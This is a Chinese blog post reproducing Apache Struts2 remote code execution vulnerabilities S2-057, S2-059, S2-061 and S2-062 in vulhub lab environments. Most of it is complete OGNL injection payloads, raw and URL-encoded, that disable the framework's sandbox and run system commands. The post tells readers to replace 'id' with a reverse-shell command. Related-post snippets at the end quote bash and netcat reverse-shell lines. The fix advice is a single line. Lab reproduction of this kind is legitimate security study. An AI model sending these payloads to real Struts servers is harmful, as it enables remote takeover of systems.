S2-057,S2-059,s2-061,s2-062漏洞复现

已于 2022-04-25 17:12:18 修改
阅读量2.9k 收藏 5
点赞数 1
文章标签: web安全
于 2022-04-12 10:04:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaobai_20190815/article/details/124116977
版权

一、漏洞描述

当Struts2的标签属性值引用了action对象的参数值时,便会出现OGNL表达式的二次解析,从而产生RCE风险(S2-059的修复方式为只修复了沙盒绕过并没有修复OGNL表达式执行点,因为这个表达式执行触发条件过于苛刻,导致S2-061再次绕过了S2-059的沙盒;s2-062是由于对s2-061的修复不完整造成的,s1-061漏洞是由于Struts2 会对某些标签属性(比如id) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 其中x 为攻击者恶意构造的OGNL表达式执行时,就产生s2-062漏洞)

二、影响版本

s2-057:<=Struts 2.3.34,Struts 2.5.16

s2-059:Struts 2.0.0 - Struts 2.5.20

s2-061:Struts 2.0.0-Struts 2.5.25

s2-062:Struts 2.0.0-Struts 2.5.29

三、环境搭建

vulhub下载,docker-compose up -d 一键起环境

四、漏洞复现

1、s2-057:

构造发包:GET /struts2-showcase/ POC /actionChain1.action

编译前poc:

${

(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).

(#ct=#request['struts.valueStack'].context).

(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).

(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).

(#ou.setExcludedPackageNames('')).(#ou.setExcludedClasses('')).

(#ct.setMemberAccess(#dm)).

(#a=@java.lang.Runtime@getRuntime().exec('id')).

(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))

}

编译后poc:

%25%7B%0A%24%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).%0A(%23ct%3D%23request%5B'struts.valueStack'%5D.context).%0A(%23cr%3D%23ct%5B'com.opensymphony.xwork2.ActionContext.container'%5D).%0A(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).%0A(%23ou.setExcludedPackageNames('')).(%23ou.setExcludedClasses('')).%0A(%23ct.setMemberAccess(%23dm)).%0A(%23a%3D%40java.lang.Runtime%40getRuntime().exec('id')).%0A(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%0A%7D

2、s2-059:

构造发包:GET /?id=POC

编译前poc:

%{

(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).

(#ct=#request['struts.valueStack'].context).

(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).

(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).

(#ou.setExcludedPackageNames('')).(#ou.setExcludedClasses('')).

(#ct.setMemberAccess(#dm)).

(#a=@java.lang.Runtime@getRuntime().exec('id')).

(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))

}

编译后poc:

%25%7b(%23dm%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(%23ct%3d%23request['struts.valueStack'].context).(%23cr%3d%23ct['com.opensymphony.xwork2.ActionContext.container']).(%23ou%3d%23cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(%23ou.setExcludedPackageNames('')).(%23ou.setExcludedClasses('')).(%23ct.setMemberAccess(%23dm)).(%23a%3d@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(%23a.getInputStream()))%7d

3、s2-061:

构造发包:GET /?id=POC

编译前POC:

%{

(#instancemanager=#application['org.apache.tomcat.InstanceManager']).

(#stack=#request['struts.valueStack']).

(#bean=#instancemanager.newInstance('org.apache.commons.collections.BeanMap')).

(#bean.setBean(#stack)).

(#context=#bean.get('context')).

(#bean.setBean(#context)).

(#macc=#bean.get('memberAccess')).

(#bean.setBean(#macc)).

(#emptyset=#instancemanager.newInstance('java.util.HashSet')).

(#bean.put('excludedClasses',#emptyset)).

(#bean.put('excludedPackageNames',#emptyset)).

(#arglist=#instancemanager.newInstance('java.util.ArrayList')).

(#arglist.add('id')).

(#execute=#instancemanager.newInstance('freemarker.template.utility.Execute')).

(#execute.exec(#arglist))}

编译后:

%25%7b(%23instancemanager%3d%23application['org.apache.tomcat.InstanceManager']).(%23stack%3d%23request['struts.valueStack']).(%23bean%3d%23instancemanager.newInstance('org.apache.commons.collections.BeanMap')).(%23bean.setBean(%23stack)).(%23context%3d%23bean.get('context')).(%23bean.setBean(%23context)).(%23macc%3d%23bean.get('memberAccess')).(%23bean.setBean(%23macc)).(%23emptyset%3d%23instancemanager.newInstance('java.util.HashSet')).(%23bean.put('excludedClasses',%23emptyset)).(%23bean.put('excludedPackageNames',%23emptyset)).(%23arglist%3d%23instancemanager.newInstance('java.util.ArrayList')).(%23arglist.add('id')).(%23execute%3d%23instancemanager.newInstance('freemarker.template.utility.Execute')).(%23execute.exec(%23arglist))%7d

4、s2-062(此处使用的是vulfocus的CVE-2020-17530的镜像,061的镜像062一样适用)

构造发包:POST /index.action

%{
(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +
(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +
(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'id'}))
}

五、漏洞利用

直接替换'id'为反弹命令

六、漏洞修复

更新到最新版本

whatever`
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[渗透测试笔记] 45.struct2/s2-059漏洞复现
H4ppyD0g的博客
03-14 931
文章目录漏洞描述漏洞原理漏洞复现 漏洞描述 Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 漏洞原理 OGNL是Object Graphic Navigation Language(对象图导航语言)的缩写。Struts2框架使用OGNL作为默认的表达式语言。 OGNL作用:取值,获取javaBean中的属性,获取List或者数组元素,获得Map的键值对,还
S2-061远程代码执行漏洞和fastjson 1.2.24 反序列化导致任意命令执行漏洞复现
weixin_48739941的博客
04-21 2488
1. 复现S2-061远程代码执行漏洞 (1) cd vulhub/struts2/s2-061 切换目录。 (2) docker-compose up -d 启动。 (3) http://192.168.80.161:8080/ (4)执行命令: http://192.168.80.161:8080/?id=%25{(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application[%27or
命令执行漏洞【2】vulhub远程命令执行漏洞复现
最新发布
LfanBQX的博客
04-26 364
bash -i >& /dev/tcp/10.1.1.101/6666 0>&1 (被控制端未装nc,就可以使用bash(linux都能连接))在linux特有临时目录/tmp下创建空文件,由于通常该目录中不会存在该名称的文件,所以可以作为命令执行的验证命令.被控制端 nc 10.1.1.101 6666 -e /bin/bash。可看到在/tmp/路径下,已成功创建的success文件,说明漏洞利用成功。(1)s2-061漏洞复现。(2)s2-059漏洞复现
vulhub】Struts2 S2-059 远程代码执行漏洞(CVE-2019-0230)
weixin_42884199的博客
12-07 1076
前言 Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 影响版本: Struts 2.0.0 - Struts 2.5.20 一、启动靶机 docker-compose build docker-compose up -d 二、构造payload view-source:http://192.168.150.146:8080/index.action?i
Struts2-059 远程代码执行漏洞(CVE-2019-0230)分析
weixin_46236101的博客
10-14 3101
前言 2020年8月13日虽然近几年来关于ONGL方面的漏洞已经不多了,但是毕竟是经典系列的RCE漏洞,还是有必要分析的。而且对于Struts2和OGNL了解也有助于代码审计和漏洞挖掘。 首先了解一下什么是OGNL,Object Graphic Navigation Language(对象图导航语言)的缩写,Struts框架使用OGNL作为默认的表达式语言。 struts2_S2_059S2_029漏洞产生的原理类似,都是由于标签属性值进行二次表达式解析产生的,细微差别会在分析中提到。 漏洞利用前置条件是
Struts2 S2-061(CVE-2020-17530)漏洞复现
qq_56258713的博客
07-03 1368
Struts2 S2-061(CVE-2020-17530)漏洞复现
struts2漏洞_Struts2 S2059远程代码执行漏洞(CVE20190230)
weixin_39989443的博客
12-10 249
作为一家专业的网络安全服务供应商,圣博润特别注重对最新安全漏洞的发现和追踪,以“及时性、准确性、层次性”为宗旨,为用户提供漏洞预警、通告及响应服务。一、Struts2简介Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下...
structs2最新远程执行漏洞S2-057、反序列化漏洞等修复方案
08-30
Apache Struts2 官方发布了最新的安全公告,披露了一个远程命令执行漏洞漏洞编号:CVE-2018-11776,官方编号:S2-057),攻击者可利用漏洞实施远程命令执行攻击。特给出struct2.0-2.3.35的修复方案
应用笔记S2-LP+开发套件入门
09-11
S2-LP 开发套件入门】 本文主要介绍了基于S2-LP的多个开发套件,S2-LP是一款超低功耗、低数据速率的低于1 GHz射频收发器,适用于各种无线通信应用。以下是各开发套件的简要概述: 1. STEVAL-FKI433V2:覆盖413-...
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
然而,这个框架的历史上存在一系列的安全漏洞,其中特别值得关注的是与反序列化相关的漏洞,如s2-005、s2-016、s2-016_3和s2-017。这些漏洞允许攻击者通过精心构造的输入,利用Struts2的内置机制执行任意代码,从而...
S2-LP中文手册.pdf
12-30
ST公司无线收发芯片S2-LP中文数据手册
s2_061一键getshell工具
12-18
s2_061一键getshell工具
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-059(CVE-2019-0230)
qq_51577576的博客
12-14 605
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-059(CVE-2019-0230) 漏洞产生的主要原因是因为Apache Struts框架在强制执行时,会对分配给某些标签属性(如id)的属性值执行二次ognl解析。攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析,最终造成远程代码执行的影响。
Vulhub靶场之struts2漏洞复现
weixin_66717977的博客
03-21 1330
struts2漏洞中属s2系列杀伤力最大,本文基于vulhub靶场,将介绍并复现strut2漏洞
编码转换漏洞_CVE202017530 Struts2S2061)远程代码执行漏洞
weixin_39959335的博客
01-14 452
漏洞信息漏洞编号:CVE-2020-17530漏洞描述:Apache Struts2框架是第二代基于Model-View-Controller(MVC)模型Java企业级Web应用框架,成为国内外较为流行的容器软件中间件,于2020年12月8日披露S2-061 Struts2远程代码执行漏洞。由于Struts2会对某些标签属性(如id)的属性值进行二次表达式解析,当这些标签属性中使用了%...
Struts2 远程命令执行漏洞(CVE-2020-17530)(S2-061
归零者的博客
11-22 134
Struts2 远程命令执行漏洞(CVE-2020-17530)(S2-061
struts2 CVE-2021-31805-struts2 s2-061 ONGL远程代码执行复现
weixin_65582330的博客
03-18 991
接下来我们可以注入下面的payload来进行代码执行,执行id来查看当前用户。我们可以输入下面的命令来测试一下,执行6*6,查看源代码发现可以成功运行。把生成的payload粘贴到exec({''})命令执行函数里边。,这里的ip写攻击机,这里我用的是kali。切换到vulhub开启并且查看靶场的端口。
Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)漏洞复现
sechelper的博客
01-11 614
cve漏洞详细复现漏洞利用,反弹shell,工具分享
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值